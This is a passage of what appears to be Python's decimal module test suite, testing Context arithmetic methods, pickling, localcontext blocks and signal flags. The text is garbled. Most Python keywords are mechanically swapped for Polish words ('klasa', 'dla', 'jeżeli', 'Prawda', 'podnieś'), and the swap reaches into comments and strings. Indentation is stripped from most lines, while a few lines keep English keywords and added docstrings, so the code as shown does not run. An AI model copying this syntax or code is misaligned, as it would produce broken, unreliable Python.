self.assertPrawda(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
    """Run the PythonAPItests suite against the C implementation (_decimal)."""
    decimal = C
class PyPythonAPItests(PythonAPItests):
    """Run the PythonAPItests suite against the pure-Python implementation."""
    decimal = P
klasa ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=Nic, rounding=Nic, Emax=Nic, Emin=Nic,
capitals=Nic, clamp=Nic, flags=Nic, traps=Nic)
dla c w [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
zaimportuj _testcapi
c = self.decimal.Context()
dla rnd w RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
dla proto w range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] jeżeli C inaczej [(P, P)]
dla dumper, loader w combinations:
dla ri, _ w enumerate(RoundingModes):
dla fi, _ w enumerate(OrderedSignals[dumper]):
dla ti, _ w enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), przy the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` oraz `_clamp`; w Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 dla Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... oraz dla Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
    """Context.to_integral_value accepts an int operand; rejects strings
    and a superfluous second positional argument."""
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context

    c = Context()
    d = c.to_integral_value(Decimal(10))
    self.assertEqual(c.to_integral_value(10), d)
    self.assertRaises(TypeError, c.to_integral_value, '10')
    self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
klasa CContextAPItests(ContextAPItests):
decimal = C
klasa PyContextAPItests(ContextAPItests):
decimal = P
klasa ContextWithStatement(unittest.TestCase):
# Can't do these jako docstrings until Python 2.6
# jako doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context w the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
przy localcontext() jako enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did nie restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did nie copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context w the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
przy localcontext(new_ctx) jako enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did nie restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did nie set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did nie copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context w the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
przy localcontext() jako c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = Prawda
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertPrawda(c1.flags[Clamped])
przy localcontext(new_ctx) jako c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertNieprawda(c2.flags[Clamped])
self.assertPrawda(c2.flags[Overflow])
usuń c2
self.assertNieprawda(c1.flags[Overflow])
usuń c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertNieprawda(orig_ctx.flags[Clamped])
self.assertNieprawda(orig_ctx.flags[Overflow])
self.assertNieprawda(new_ctx.flags[Clamped])
self.assertNieprawda(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
przy localcontext() jako c1:
usuń c1
przy localcontext() jako c2:
usuń c2
przy localcontext() jako c3:
usuń c3
przy localcontext() jako c4:
usuń c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
przy localcontext() jako c1:
przy localcontext(c1) jako c2:
usuń c1
przy localcontext(c2) jako c3:
usuń c2
przy localcontext(c3) jako c4:
usuń c3
usuń c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
przy localcontext() jako c1:
usuń c1
n1 = Context(prec=1)
setcontext(n1)
przy localcontext(n1) jako c2:
usuń n1
self.assertEqual(c2.prec, 1)
usuń c2
n2 = Context(prec=2)
setcontext(n2)
usuń n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
przy localcontext(n3) jako c3:
usuń n3
self.assertEqual(c3.prec, 3)
usuń c3
n4 = Context(prec=4)
setcontext(n4)
usuń n4
self.assertEqual(getcontext().prec, 4)
przy localcontext() jako c4:
self.assertEqual(c4.prec, 4)
usuń c4
klasa CContextWithStatement(ContextWithStatement):
decimal = C
klasa PyContextWithStatement(ContextWithStatement):
decimal = P
klasa ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags podnieśd) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def podnieś_error(context, flag):
jeżeli self.decimal == C:
context.flags[flag] = Prawda
jeżeli context.traps[flag]:
podnieś flag
inaczej:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that podnieś various flags, w the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
dla fn, args w operations:
# find answer oraz flags podnieśd using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k dla k, v w context.flags.items() jeżeli v]
dla extra_flags w flagsets:
# set flags, before calling operation
context.clear_flags()
dla flag w extra_flags:
podnieś_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
dla flag w extra_flags:
jeżeli flag nie w expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k dla k,v w context.flags.items() jeżeli v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation podnieśs different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = Prawda
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = Prawda
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:Nieprawda}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
przy localcontext() jako c:
##### trap jest off by default
self.assertNieprawda(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertPrawda(c.flags[FloatOperation])
# explicit conversion does nie set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertPrawda(c.flags[FloatOperation])
##### set the trap
